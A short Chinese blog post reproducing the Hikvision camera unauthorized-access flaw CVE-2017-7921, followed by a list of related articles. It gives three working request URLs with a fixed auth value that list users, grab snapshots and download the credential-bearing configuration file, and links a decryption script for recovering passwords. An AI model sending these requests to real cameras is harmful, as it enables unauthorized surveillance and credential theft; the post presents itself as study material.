海康威视未授权访问漏洞 (CVE-2017-7921)复现研究

前言:本文内容仅供学习参考及处置建议,文章内容不涉及任何以破坏为目的的犯罪行为,敏感信息已经过脱敏处理,请勿将本文内容用于违法犯罪活动!

一、发现摄像头

(略)

二、构造payload测试

以下是可能存在漏洞的登录页面样式,经供参考。

复制代码
1.http://[摄像头IP]/Security/users?auth=YWRtaW46MTEK 获取用户 
2.http://[摄像头IP]/onvif-http/snapshot?auth=YWRtaW46MTEK 拍摄快照而不进行身份验证 
3.http://[摄像头IP]/System/configurationFile?auth=YWRtaW46MTEK 下载配置文件(该文件包含用户名密码等关键信息)

构造第一条语句,看到用户admin:

构造第二条语句,拍摄快照:

构造第三条语句,下载配置文件;

三、解密配置文件获取用户名密码

拿到用户名密码,登录成功。

解密脚本地址:

https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

声明:本文档仅供安全研究与学习交流使用,切勿用于非法渗透测试或未授权攻击。

相关推荐
Data-Miner18 小时前
精品可编辑PPT | 大模型与智能体安全风险治理与防护
安全
咕噜企业分发小米18 小时前
直播云服务器安全防护有哪些最新的技术趋势?
运维·服务器·安全
九河云20 小时前
数据驱动未来,华为云DWS为智能决策提速
大数据·人工智能·安全·机器学习·华为云
Dr.Alex Wang20 小时前
Google Firebase 实战教学 - Streamlit、Bucket、Firebase
数据库·python·安全·googlecloud
chipsense20 小时前
强电流环境下用霍尔电流传感器,安全性能有保障么?
安全·霍尔电流传感器
安全渗透Hacker20 小时前
参数未校验导致的DOS(服务拒绝)问题典型场景
java·安全·web安全·网络安全·安全性测试
bigHead-20 小时前
Git合并操作详解:安全高效地合并远程分支
git·安全·elasticsearch
pusheng202520 小时前
双气联防技术在下一代储能系统安全预警中的应用
前端·安全
安科瑞-小李20 小时前
连锁门店用电安全 + 能效双提升!安科瑞智能物联系统,实时监控、异常报警、节能优化一步到位!
安全·节能降耗·智能照明系统·场景化照明·能耗监测与优化·自适应调节